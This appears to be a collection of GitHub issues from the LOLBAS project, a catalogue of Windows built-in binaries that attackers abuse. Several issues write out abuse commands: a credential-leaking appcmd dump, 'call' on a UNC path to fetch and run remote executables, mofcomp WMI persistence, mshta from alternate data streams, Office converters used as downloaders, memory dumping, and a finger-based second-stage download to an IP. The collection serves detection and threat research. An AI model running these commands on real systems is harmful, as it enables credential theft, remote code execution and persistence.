lolbas-project / lolbas Goto Github PK

%windir%\system32\inetsrv\appcmd list apppool /config /xml > c:\apppools.xml

Can leak app pool identity credentials, if allowed to run appcmd and IIS has apppools configured as SpecificUser

example of the output:

Not sure if this would be a fit for this project.

https://www.howtogeek.com/125447/stupid-geek-tricks-how-to-download-firefox-on-a-new-computer-without-using-internet-explorer/

Is there a way to non-interactively download a file with ftp.exe ?

https://lolbas-project.github.io/lolbas/Binaries/Rasautou/

rasautou -d powershell.dll -p powershell -a a -e e

The -p parameter is an arbitrary export. For example:

rasautou -d powershell.dll -p lolbas -a a -e e

As long as the export from the -p parameter exists in "powershell.dll", rasautou will execute it.

Missing Lolbins

esentutl.exe (https://twitter.com/egre55/status/987037150108684288)

SystemSettings.exe (http://www.hexacorn.com/blog/2018/08/12/systemsettings-exe-yet-another-lolbin-for-loading-dlls/)

PrintDialog.exe (http://www.hexacorn.com/blog/2018/08/11/printdialog-exe-yet-another-lolbin-for-loading-dlls/)

Hello, userinit.exe which is built into Windows has been used in a living off the land attack (Astaroth).

Astaroth attack:
https://securityintelligence.com/news/astaroth-attack-infects-windows-machines-via-living-off-the-land-techniques/

Backdoor installed with userinit.exe detected by Trend Micro.
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Backdoor.Win32.SIMDA.C003X3KQ19/

Currently the search only checks for binary names. It would be helpful to search the category name as well. If that's not possible, I would argue that category search is more useful than binary name.

Add a guid field on every yaml file, making sure every one has a unique identifier.
Can use new-guid in powershell for instance...

Management script does not handle conversion of files with multiple . in the name. Example: Microsoft.Workflow.compiler.exe.

Hello

Will this awesome project be updating soon the technique ID field to distinguish if it is mapped to V6 (legacy) or V7 (current) of the ATT&CK Enterprise matrix?

I was looking at your repo for MpCmdRun, and I noticed one of the cited techniques is T1105

You can see below the tool I am using allows for querying both the enterprise-legacy and current version of the enterprise matrix.

I just wanted to integrate your project into the tool I am using and need to know how to reliably afford myself and everyone using my tool an accurate representation of which version of the matrix a technique cited in your repo for the LOLBAS is intended for.

Happy to help too :)

Add links to reports showing usage in the wild

Add information about detection

call is used to "call one batch program from another", but has some interesting properties when combined with UNC paths.

It can be used to send hashes to a Responder listener, much like you would do with net.exe, because it authenticates with SMB (like all UNC paths)

More importantly, it also functions as a convenient download and execute for .bat, .js., .exe, etc. hosted on remote systems.

call \\192.168.1.28\share\test4.exe
call \\192.168.1.28\share\test2.js

I didn't see anything else in the repo source or other issues about call. Searching the wider Internet is a little difficult as the generic name makes it hard to search for. I have 0 idea if it can be used for whitelist bypasses etc.

https://lolbas-project.github.io/ is generating the following error when I try to access the url via Firefox 84.0.2

Secure Connection Failed
An error occurred during a connection to lolbas-project.github.io. SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG

The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.

Please add mofcomp.exe (Compile, Execution)
Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)
mofcomp.exe can be used to establish WMI Event Subscription persistence mechanisms configured from a .mof/.bmof file.

Example:
iisstt.dat
This BMOF-file contains malicious VBS-script

mofcomp.exe iisstt.dat
As a result, this script is injected in WMI repository and runs every day 23:00

https://twitter.com/B_H101/status/1252138973847306241

Add information about the privileges required.
For instance, does it require admin access or not.

https://twitter.com/Hexacorn/status/1357997809207803906
https://twitter.com/infosecn1nja/status/1358250898191835136
https://twitter.com/Hexacorn/status/1358074716146302976

Regasm: "RegisterClass" requires local administrator, "UnRegisterClass" (regasm.exe /U) requires user level privileges.

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

Regsvcs: "RegisterClass" requires local administrator, you cannot abuse Regsvcs with user level privileges as far as I know.

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

Mostly creating this issue to remind myself to fix this as we're being referenced by MITRE and other reputable organizations.

When a new file is created or an existing is changed in the LOLBAS YML folder there should be some kind of automation that copies this files over to the other repo so that changes are reflected in the web portal.

please add wuauclt.exe exec and download. 😁

How we can perform whole attacks simulation by using lol bins ??
I have tried many of lolbins topics still now nothing is with the use of LOLBINS
Do you have any link that can show us any Simulation so that I will perform it and understand the LOLBINS working.

Ability to search on the Mitre Txxx tecniques on the main page.

https://twitter.com/DissectMalware/status/997340270273409024

Create management scripts for generating MD files from the yaml files.

https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-20e5e9c1ed8e

Specific tags/labeling for specific capability caveats, for example a App Whitelist bypass that works on AppLocker & Solidcore could cary tags for each product

It states Windows client operating systems, but it is only on servers
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz

Hello All,

Thank you for this project.

Is there a way to export the entire list & content of LOLBins to a spreadsheet ?

Best Regards

Source: https://twitter.com/Hexacorn/status/1396536863498907654

C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe accepts URL so you can use it as a downloader

excelcnv.exe -oice

caveat? your download will be saved as an XLSX and binary data will be stored encoded with UTF8 inside xl\sharedStrings.xml

Also from https://gist.github.com/AhnSeongHyun/3372088:

Word:
"C:\Program Files\Microsoft Office\Office12\wordconv.exe" -oice -nme

Excel:
"C:\Program Files\Microsoft Office\Office12\excelcnv.exe" -oice

PowerPoint:
"C:\Program Files\Microsoft Office\Office12\ppcnvcom.exe" -oice

예) PPCNVCOM.EXE -oice C:\b.ppt C:\b.pptx

Note that it appears to do preprocessing, so the payload may need to be base64 encoded to ensure it's not modified

rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1

Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21

split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf [ ] Provide the project in DB format (sqlite)

Add verified OS version / build on the different commands

Alternate data streams should be T1096

Technique: T1130 Install Root Certificate should be added. ref:https://www.vmray.com/analyses/hancitor-malspam-analysis/report/overview.html

Remove this: https://lolbas-project.github.io/lolbas/Scripts/Slmgr/

And the COM example on this:
https://lolbas-project.github.io/lolbas/Scripts/Winrm/

Note: Use the XML, not the bulleted list towards the top of the following page.

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Was testing this out today, but wasn't able to get mshta to cooperate. If I inject an HTA into an ADS for some file "C:\ADS\file.txt"

type bad.hta > C:\ADS\file.txt:bad.hta

and try to execute with

mshta.exe "C:\ADS\file.txt:bad.hta"

I get a big white window, which I believe is an indication that mshta can't find the HTA. I'm currently testing on Version 1903. Do we know if mshta can still read from an ADS? Or am I missing something crucial?

What are thoughts on people doing pull requests to update the yml files to specific Mitre sub-techniques when they're relevant?

For example, in At.yml, update this:
MitreID: T1053
MitreLink: https://attack.mitre.org/wiki/Technique/T1053

to this:
MitreID: T1053.002
MitreLink: https://attack.mitre.org/techniques/T1053/002/

Map binary to the mitre att&ck framework.

Categories must be linked to the different commands.
Example of a file that has multiple categories.
https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS-Project.github.io/master/_lolbas/Binaries/Bitsadmin.md

Hi,

I'm trying to reproduce msdt.exe execution but I'm unable to :\

First issue was with the xml file, on my pc only the UTF-8 is accepted, the utf-16 doesn't, working version below:

<?xml version="1.0" encoding="UTF-8"?>
<Answers Version="1.0">
	<Interaction ID="IT_LaunchMethod">
		<Value>ContextMenu</Value>
	</Interaction>
	<Interaction ID="IT_SelectProgram">
		<Value>NotListed</Value>
	</Interaction>
	<Interaction ID="IT_BrowseForFile">
		<Value>C:\poc.exe</Value>
	</Interaction>
</Answers>

Even after changing the xml the executable is not run automatically but requires additional user interaction, is it the correct behavior?

I'm running windows 10.0.18363 Build 18363

Thanks and keep rocking!

Create the CONTRIBUTION file and add "rules" for contributing.

I want to scrape just the list of binary names (eg 'schtasks.exe'). I can either scrape the list on the site or parse thru all the yml files. Is there a consolidated list that would make it easier? Thanks!

https://twitter.com/bigmacjpg/status/1349727699863011328
@bigmacjpg
https://virustotal.com/gui/file/321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67/detection
ITW maldoc using finger.exe to download 2nd stage. Runs 'finger nc20@184[.]164[.]146[.]102' to pull down b64 encoded cert, certutil to decode, runs payload. Payload is https://virustotal.com/gui/file/2722583e6895d6d1d1a3c7baad1090fb8e9395ee5fb58c4e035a1ee8a54751bd/details.

There is a technique listed here:

https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

rundll32.exe -sta {CLSID}

but I don't see one for:

dllhost /Processid:{CLSID}

I've read the instructions for making a submission but figured I should ask if it makes sense to add this, lol. Thanks.

The Detection section of the Atbroker page is incorrect.

It says:

Detection:
Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware

This line is incorrect:

Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs

Correct:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs

As per the linked resources:

With Windows 8 Microsoft introduced a way to register third-party Assistive Technology applications on the system. All of them are stored inside the Registry under the following branch:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs

https://amp.hothardware.com/news/windows-defender-can-now-download-malware

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/resources.html#LOLBAS

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

• Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
• Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
• Fast: Using static and client side technologies resulting in fast browsing.
• Rich tables: search, sort, browse, filter, clear
• Fancy informational popups
• Badges / Shields
• Static API
• Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

• Specialized websites: Some websites are referencing tools but additional information is not available or browsable. Make additional searches take time.
• Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
• Search engines: Search engines sometimes does find nothing, some tools or resources are too unknown or non-referenced. These is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care.